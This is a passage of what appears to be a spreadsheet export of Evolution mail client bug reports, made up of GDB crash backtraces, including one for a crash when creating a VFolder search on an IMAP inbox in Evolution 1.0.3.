#42 0xb774f7ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#43 0xb7591802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#44 0xb75947df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#45 0xb7594b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#46 0xb7d74a23 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#47 0x0805f718 in main (argc=2 argv=0xbf894304) at main.c:615
Thread 10 (Thread -1277510752 (LWP 25149)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 9 (Thread -1285903456 (LWP 25150)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 8 (Thread -1294296160 (LWP 25151)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 7 (Thread -1302688864 (LWP 25152)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 6 (Thread -1320297568 (LWP 25157)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 5 (Thread -1368183904 (LWP 25257)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 4 (Thread -1377363040 (LWP 25261)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71cd321 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7288f1c in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb72895e9 in e_msgport_reply () from /usr/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1311081568 (LWP 32595)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71ca803 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7594813 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7594b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb72abe62 in e_book_get_type () from /usr/lib/libebook-1.2.so.9
No symbol table info available.
#5  0xb75af38f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1387476064 (LWP 32598)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71ca803 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7594813 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7594b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7ca07e0 in link_set_io_thread () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb75af38f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb706c504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb71d451e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1232779600 (LWP 25076)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71956cb in waitpid () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7ea11b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x0805f8e9 in segv_redirect (sig=11) at main.c:426
No locals.
#4  
No symbol table info available.
#5  0xb6e7a01c in e_table_state_save_to_node (state=0x0 parent=0x0)
    at e-table-state.c:254
	i = 
	node = (xmlNode *) 0x83d56c0
#6  0xb6e7a1fe in e_table_state_save_to_file (state=0x0 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at e-table-state.c:215
	doc = (xmlDoc *) 0x8409288
#7  0xb4003aa8 in gal_view_etable_save (view=0x8b01628 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at gal-view-etable.c:103
No locals.
#8  0xb4006c2d in gal_view_save (view=0x8b01628 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at gal-view.c:92
	__PRETTY_FUNCTION__ = gal_view_save
#9  0xb40022c7 in gal_view_collection_save (collection=0x899bf70)
    at gal-view-collection.c:543
	child = 
	item = (GalViewCollectionItem *) 0x8b5f260
	i = 0
	doc = (xmlDoc *) 0x8ce8b00
	root = (xmlNode *) 0x8c6f220
	filename = 
	__PRETTY_FUNCTION__ = gal_view_collection_save
#10 0xb4000653 in dialog_response (dialog=0x83ad9a0 response_id=-7 data=0x0)
    at gal-define-views-dialog.c:238
No locals.
#11 0xb7612879 in g_cclosure_marshal_VOID () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0xb7615b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb7960f5a in gtk_dialog_response () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0xb7960fb5 in gtk_dialog_response () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb7612b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb7615b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0xb7915093 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0xb7916cde in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0xb7612b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0xb7603fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0xb761602a in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0xb7915123 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0xb7915181 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0xb79e4b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#34 0xb7603fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0xb76161e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0xb7616e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#39 0xb7af85f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0xb79ddef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0xb79df0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#42 0xb774f7ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#43 0xb7591802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0xb75947df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0xb7594b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#46 0xb7d74a23 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#47 0x0805f718 in main (argc=2 argv=0xbf894304) at main.c:615
	fd = 
	uri_list = (GSList *) 0x0
	program = (GnomeProgram *) 0x806e028
	context = 
	icon_list = 
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>lorenco</t>
  </si>
  <si>
    <t>EVOLUTION-224279</t>
  </si>
  <si>
    <t>Creation of VFolder search from IMAP inbox crashes evolution</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: Creation of VFolder search from IMAP inbox crashes evolution
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
I use Evolution to access local mail via IMAP.
When I create a VFolder search on the Inbox based on the subject
Evolution crashes.
Redhat 7.2 with Ximian Gnome 1.4.
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 2300)]
[New Thread 2049 (LWP 2308)]
[New Thread 1026 (LWP 2309)]
[New Thread 2051 (LWP 2310)]
[New Thread 3076 (LWP 2376)]
[New Thread 5126 (LWP 2379)]
0x40f5f669 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x40f5f669 in __wait4 () from /lib/i686/libc.so.6
#1  0x40fdb154 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40e9a523 in waitpid (pid=2400 stat_loc=0xbfffe02c options=0)
    at wrapsyscall.c:172
#3  0x409247b2 in gnome_segv_handle (signum=11) at gnome-init.c:664
#4  0x0809d5ed in message_browser_get_type () at eval.c:41
#5  0x40e988d5 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135494448 esi = 1133492828 ebp = 3221218312 esp = 3221218284 ebx = 2379 edx = 1089091064 ecx = 32 eax = 0 trapno = 0 err = 0 eip = 1089288705 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221218284 ss = 43 __ssh = 0 fpstate = 0xbfffe170 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40ed3a01 in __kill () from /lib/i686/libc.so.6
#8  0x40e98007 in __pthread_restart_new (th=0x438fbbe0) at pthread.c:1078
#9  0x40e99c21 in __pthread_alt_unlock (lock=0x8137b30) at restart.h:24
#10 0x40e96ce4 in __pthread_mutex_unlock (mutex=0x8137b20) at mutex.c:195
#11 0x40088dca in e_thread_put (e=0x8137b18 msg=0x82fba58) at e-msgport.c:627
#12 0x0809b3da in mail_tools_x_evolution_message_parse () at eval.c:41
#13 0x0809bfd1 in mail_vfolder_rename_uri () at eval.c:41
#14 0x40bf79bd in gtk_marshal_NONE__POINTER (object=0x8154370 
    func=0x809bfe4  func_data=0x8154370 
    args=0xbfffe620) at gtkmarshal.c:193
#15 0x40c270ee in gtk_handlers_run (handlers=0x80f80c0 signal=0xbfffe5c0 
    object=0x8154370 params=0xbfffe620 after=0) at gtksignal.c:1917
#16 0x40c2654f in gtk_signal_real_emit (object=0x8154370 signal_id=108 
    params=0xbfffe620) at gtksignal.c:1477
#17 0x40c245c4 in gtk_signal_emit (object=0x8154370 signal_id=108)
    at gtksignal.c:552
#18 0x080cc9c6 in rule_context_add_rule () at eval.c:41
#19 0x0809c8c5 in vfolder_edit_rule () at eval.c:41
#20 0x408ff385 in gnome_dialog_marshal_signal_1 (object=0x82d6940 
    func=0x809c88c  func_data=0x0 args=0xbfffea10)
    at gnome-dialog.c:145
#21 0x40c270ee in gtk_handlers_run (handlers=0x82b13e0 signal=0xbfffe9b0 
    object=0x82d6940 params=0xbfffea10 after=0) at gtksignal.c:1917
#22 0x40c2654f in gtk_signal_real_emit (object=0x82d6940 signal_id=243 
    params=0xbfffea10) at gtksignal.c:1477
#23 0x40c245c4 in gtk_signal_emit (object=0x82d6940 signal_id=243)
    at gtksignal.c:552
#24 0x40900d58 in gnome_dialog_button_clicked (button=0x81bd6f8 
    dialog=0x82d6940) at gnome-dialog.c:1014
#25 0x40bf7a9b in gtk_marshal_NONE__NONE (object=0x81bd6f8 
    func=0x40900c5c  func_data=0x82d6940 
    args=0xbfffedd0) at gtkmarshal.c:312
#26 0x40c270ee in gtk_handlers_run (handlers=0x82b13a0 signal=0xbfffed70 
    object=0x81bd6f8 params=0xbfffedd0 after=1) at gtksignal.c:1917
#27 0x40c2668b in gtk_signal_real_emit (object=0x81bd6f8 signal_id=68 
    params=0xbfffedd0) at gtksignal.c:1516
#28 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=68)
    at gtksignal.c:552
#29 0x40b95540 in gtk_button_clicked (button=0x81bd6f8) at gtkbutton.c:336
#30 0x40b96ab6 in gtk_real_button_released (button=0x81bd6f8)
    at gtkbutton.c:861
#31 0x40bf7a9b in gtk_marshal_NONE__NONE (object=0x81bd6f8 
    func=0x40b96a10  func_data=0x0 args=0xbffff160)
    at gtkmarshal.c:312
#32 0x40c263fb in gtk_signal_real_emit (object=0x81bd6f8 signal_id=67 
    params=0xbffff160) at gtksignal.c:1440
#33 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=67)
    at gtksignal.c:552
#34 0x40b95484 in gtk_button_released (button=0x81bd6f8) at gtkbutton.c:327
#35 0x40b9642b in gtk_button_button_release (widget=0x81bd6f8 event=0x8241088)
    at gtkbutton.c:721
#36 0x40bf7871 in gtk_marshal_BOOL__POINTER (object=0x81bd6f8 
    func=0x40b96368  func_data=0x0 
    args=0xbffff500) at gtkmarshal.c:28
#37 0x40c2658f in gtk_signal_real_emit (object=0x81bd6f8 signal_id=27 
    params=0xbffff500) at gtksignal.c:1492
#38 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=27)
    at gtksignal.c:552
#39 0x40c5b8a4 in gtk_widget_event (widget=0x81bd6f8 event=0x8241088)
    at gtkwidget.c:2864
#40 0x40bf77e8 in gtk_propagate_event (widget=0x81bd6f8 event=0x8241088)
    at gtkmain.c:1378
#41 0x40bf69a5 in gtk_main_do_event (event=0x8241088) at gtkmain.c:818
#42 0x40caa10f in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8d0 user_data=0x0) at gdkevents.c:2139
#43 0x40e7d055 in g_main_dispatch (dispatch_time=0xbffff8d0) at gmain.c:656
#44 0x40e7d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#45 0x40e7d7e8 in g_main_run (loop=0x8139ca8) at gmain.c:935
#46 0x40bf62ab in gtk_main () at gtkmain.c:524
#47 0x403e353b in bonobo_main () at bonobo-main.c:284
#48 0x0809d81d in main () at eval.c:41
#49 0x40ec1507 in __libc_start_main (main=0x809d638  argc=3 
    ubp_av=0xbffffaf4 init=0x8066214  fini=0x80d3630  
    rtld_fini=0x4000dc14  stack_end=0xbffffaec)
    at ../sysdeps/generic/libc-start.c:129
Thread 6 (Thread 5126 (LWP 2379)):
#0  0x40ed3aa5 in __sigsuspend (set=0x438fb260)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40e98079 in __pthread_wait_for_restart_signal (self=0x438fbbe0)
    at pthread.c:967
#2  0x40e99d39 in __pthread_alt_lock (lock=0x80e7300 self=0x0) at restart.h:34
#3  0x40e96c16 in __pthread_mutex_lock (mutex=0x80e72f0) at mutex.c:120
#4  0x0809d630 in message_browser_get_type () at eval.c:41
#5  0x40e988d5 in pthread_sighandler (signo=11 ctx=
      {gs = 55 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 8 esi = 1116705763 ebp = 1133492068 esp = 1133491996 ebx = 1116712060 edx = 8 ecx = 4294967295 eax = 0 trapno = 14 err = 4 eip = 1116657402 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 1133491996 ss = 43 __ssh = 0 fpstate = 0x438fb4a0 oldmask = 2147483648 cr2 = 8}) at signals.c:97
#6  
#7  0x428ed6fa in imap_command_strdup_vprintf (store=0x8155200 
    fmt=0x428f93e3 UID SEARCH BODY \%s\ ap=0x438fb7b0)
    at camel-imap-command.c:674
#8  0x428ec9db in camel_imap_command (store=0x8155200 folder=0x81c01a8 
    ex=0x0 fmt=0x428f93e3 UID SEARCH BODY \%s\) at camel-imap-command.c:92
#9  0x428f304d in imap_body_contains (f=0x82fe120 argc=0 argv=0x438fb80c 
    s=0x82fdf20) at camel-imap-search.c:145
#10 0x4008b24c in e_sexp_term_eval (f=0x82fe120 t=0x82faf28) at e-sexp.c:642
#11 0x4008a83c in term_eval_or (f=0x82fe120 argc=4 argv=0x82fb098 
    data=0x4009b160) at e-sexp.c:301
#12 0x4008b1f4 in e_sexp_term_eval (f=0x82fe120 t=0x82fae78) at e-sexp.c:632
#13 0x4008c03b in e_sexp_eval (f=0x82fe120) at e-sexp.c:1214
#14 0x4004c095 in camel_folder_search_execute_expression (search=0x82fdf20 
    expr=0x82d34e0  (or\n  \n\t(match-all (header-contains \Subject\  \cron\))\n     \n  \n\t(body-contains )\n     \n  (match-all (header-contains \From\ ))\n  \n\t(match-all (or (header-contains \To\ )\n\t ' '  (header-con... ex=0x0) at camel-folder-search.c:339
#15 0x428f00f3 in imap_search_by_expression (folder=0x81c01a8 
    expression=0x82d34e0  (or\n  \n\t(match-all (header-contains \Subject\  \cron\))\n     \n  \n\t(body-contains )\n     \n  (match-all (header-contains \From\ ))\n  \n\t(match-all (or (header-contains \To\ )\n\t ' '  (header-con... ex=0x0) at camel-imap-folder.c:1323
#16 0x40053dea in camel_folder_search_by_expression (folder=0x81c01a8 
    expression=0x82d34e0  (or\n  \n\t(match-all (header-contains \Subject\  \cron\))\n     \n  \n\t(body-contains )\n     \n  (match-all (header-contains \From\ ))\n  \n\t(match-all (or (header-contains \To\ )\n\t ' '  (header-con... ex=0x0) at camel-folder.c:1071
#17 0x4007edb6 in vee_folder_build_folder (vf=0x82cf900 source=0x81c01a8 
    ex=0x0) at camel-vee-folder.c:989
#18 0x4007d865 in camel_vee_folder_add_folder (vf=0x82cf900 sub=0x81c01a8)
    at camel-vee-folder.c:362
#19 0x4007dc8d in camel_vee_folder_set_folders (vf=0x82cf900 
    folders=0x82d9248) at camel-vee-folder.c:470
#20 0x0809b2db in mail_tools_x_evolution_message_parse () at eval.c:41
#21 0x08092ae5 in mail_msg_wait_all () at eval.c:41
#22 0x400889fd in thread_received_msg (e=0x8137b18 m=0x82fba58)
    at e-msgport.c:469
#23 0x40088b7e in thread_dispatch (din=0x8137b18) at e-msgport.c:550
#24 0x40e95b9c in pthread_start_thread (arg=0x438fbbe0) at manager.c:274
Thread 5 (Thread 3076 (LWP 2376)):
#0  0x40ed3aa5 in __sigsuspend (set=0x428e690c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40e98079 in __pthread_wait_for_restart_signal (self=0x428e6be0)
    at pthread.c:967
#2  0x40e94bdc in pthread_cond_wait (cond=0x8137b08 mutex=0x8137ae8)
    at restart.h:34
#3  0x400884ce in e_msgport_wait (mp=0x8137ac0) at e-msgport.c:198
#4  0x40088af6 in thread_dispatch (din=0x8137a70) at e-msgport.c:517
#5  0x40e95b9c in pthread_start_thread (arg=0x428e6be0) at manager.c:274
Thread 4 (Thread 2051 (LWP 2310)):
#0  0x40ed3aa5 in __sigsuspend (set=0x420e690c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40e98079 in __pthread_wait_for_restart_signal (self=0x420e6be0)
    at pthread.c:967
#2  0x40e94bdc in pthread_cond_wait (cond=0x8137c58 mutex=0x8137c38)
    at restart.h:34
#3  0x400884ce in e_msgport_wait (mp=0x8137c10) at e-msgport.c:198
#4  0x40088af6 in thread_dispatch (din=0x8137bc0) at e-msgport.c:517
#5  0x40e95b9c in pthread_start_thread (arg=0x420e6be0) at manager.c:274
Thread 3 (Thread 1026 (LWP 2309)):
#0  0x40ed3aa5 in __sigsuspend (set=0x418e690c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40e98079 in __pthread_wait_for_restart_signal (self=0x418e6be0)
    at pthread.c:967
#2  0x40e94bdc in pthread_cond_wait (cond=0x8137c58 mutex=0x8137c38)
    at restart.h:34
#3  0x400884ce in e_msgport_wait (mp=0x8137c10) at e-msgport.c:198
#4  0x40088af6 in thread_dispatch (din=0x8137bc0) at e-msgport.c:517
#5  0x40e95b9c in pthread_start_thread (arg=0x418e6be0) at manager.c:274
Thread 2 (Thread 2049 (LWP 2308)):
#0  0x40f8a9f7 in __poll (fds=0x813c44c nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x40e95890 in __pthread_manager (arg=0x1a) at manager.c:139
Thread 1 (Thread 1024 (LWP 2300)):
#0  0x40f5f669 in __wait4 () from /lib/i686/libc.so.6
#1  0x40fdb154 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40e9a523 in waitpid (pid=2400 stat_loc=0xbfffe02c options=0)
    at wrapsyscall.c:172
#3  0x409247b2 in gnome_segv_handle (signum=11) at gnome-init.c:664
#4  0x0809d5ed in message_browser_get_type () at eval.c:41
#5  0x40e988d5 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135494448 esi = 1133492828 ebp = 3221218312 esp = 3221218284 ebx = 2379 edx = 1089091064 ecx = 32 eax = 0 trapno = 0 err = 0 eip = 1089288705 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221218284 ss = 43 __ssh = 0 fpstate = 0xbfffe170 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40ed3a01 in __kill () from /lib/i686/libc.so.6
#8  0x40e98007 in __pthread_restart_new (th=0x438fbbe0) at pthread.c:1078
#9  0x40e99c21 in __pthread_alt_unlock (lock=0x8137b30) at restart.h:24
#10 0x40e96ce4 in __pthread_mutex_unlock (mutex=0x8137b20) at mutex.c:195
#11 0x40088dca in e_thread_put (e=0x8137b18 msg=0x82fba58) at e-msgport.c:627
#12 0x0809b3da in mail_tools_x_evolution_message_parse () at eval.c:41
#13 0x0809bfd1 in mail_vfolder_rename_uri () at eval.c:41
#14 0x40bf79bd in gtk_marshal_NONE__POINTER (object=0x8154370 
    func=0x809bfe4  func_data=0x8154370 
    args=0xbfffe620) at gtkmarshal.c:193
#15 0x40c270ee in gtk_handlers_run (handlers=0x80f80c0 signal=0xbfffe5c0 
    object=0x8154370 params=0xbfffe620 after=0) at gtksignal.c:1917
#16 0x40c2654f in gtk_signal_real_emit (object=0x8154370 signal_id=108 
    params=0xbfffe620) at gtksignal.c:1477
#17 0x40c245c4 in gtk_signal_emit (object=0x8154370 signal_id=108)
    at gtksignal.c:552
#18 0x080cc9c6 in rule_context_add_rule () at eval.c:41
#19 0x0809c8c5 in vfolder_edit_rule () at eval.c:41
#20 0x408ff385 in gnome_dialog_marshal_signal_1 (object=0x82d6940 
    func=0x809c88c  func_data=0x0 args=0xbfffea10)
    at gnome-dialog.c:145
#21 0x40c270ee in gtk_handlers_run (handlers=0x82b13e0 signal=0xbfffe9b0 
    object=0x82d6940 params=0xbfffea10 after=0) at gtksignal.c:1917
#22 0x40c2654f in gtk_signal_real_emit (object=0x82d6940 signal_id=243 
    params=0xbfffea10) at gtksignal.c:1477
#23 0x40c245c4 in gtk_signal_emit (object=0x82d6940 signal_id=243)
    at gtksignal.c:552
#24 0x40900d58 in gnome_dialog_button_clicked (button=0x81bd6f8 
    dialog=0x82d6940) at gnome-dialog.c:1014
#25 0x40bf7a9b in gtk_marshal_NONE__NONE (object=0x81bd6f8 
    func=0x40900c5c  func_data=0x82d6940 
    args=0xbfffedd0) at gtkmarshal.c:312
#26 0x40c270ee in gtk_handlers_run (handlers=0x82b13a0 signal=0xbfffed70 
    object=0x81bd6f8 params=0xbfffedd0 after=1) at gtksignal.c:1917
#27 0x40c2668b in gtk_signal_real_emit (object=0x81bd6f8 signal_id=68 
    params=0xbfffedd0) at gtksignal.c:1516
#28 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=68)
    at gtksignal.c:552
#29 0x40b95540 in gtk_button_clicked (button=0x81bd6f8) at gtkbutton.c:336
#30 0x40b96ab6 in gtk_real_button_released (button=0x81bd6f8)
    at gtkbutton.c:861
#31 0x40bf7a9b in gtk_marshal_NONE__NONE (object=0x81bd6f8 
    func=0x40b96a10  func_data=0x0 args=0xbffff160)
    at gtkmarshal.c:312
#32 0x40c263fb in gtk_signal_real_emit (object=0x81bd6f8 signal_id=67 
    params=0xbffff160) at gtksignal.c:1440
#33 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=67)
    at gtksignal.c:552
#34 0x40b95484 in gtk_button_released (button=0x81bd6f8) at gtkbutton.c:327
#35 0x40b9642b in gtk_button_button_release (widget=0x81bd6f8 event=0x8241088)
    at gtkbutton.c:721
#36 0x40bf7871 in gtk_marshal_BOOL__POINTER (object=0x81bd6f8 
    func=0x40b96368  func_data=0x0 
    args=0xbffff500) at gtkmarshal.c:28
#37 0x40c2658f in gtk_signal_real_emit (object=0x81bd6f8 signal_id=27 
    params=0xbffff500) at gtksignal.c:1492
#38 0x40c245c4 in gtk_signal_emit (object=0x81bd6f8 signal_id=27)
    at gtksignal.c:552
#39 0x40c5b8a4 in gtk_widget_event (widget=0x81bd6f8 event=0x8241088)
    at gtkwidget.c:2864
#40 0x40bf77e8 in gtk_propagate_event (widget=0x81bd6f8 event=0x8241088)
    at gtkmain.c:1378
#41 0x40bf69a5 in gtk_main_do_event (event=0x8241088) at gtkmain.c:818
#42 0x40caa10f in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8d0 user_data=0x0) at gdkevents.c:2139
#43 0x40e7d055 in g_main_dispatch (dispatch_time=0xbffff8d0) at gmain.c:656
#44 0x40e7d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#45 0x40e7d7e8 in g_main_run (loop=0x8139ca8) at gmain.c:935
#46 0x40bf62ab in gtk_main () at gtkmain.c:524
#47 0x403e353b in bonobo_main () at bonobo-main.c:284
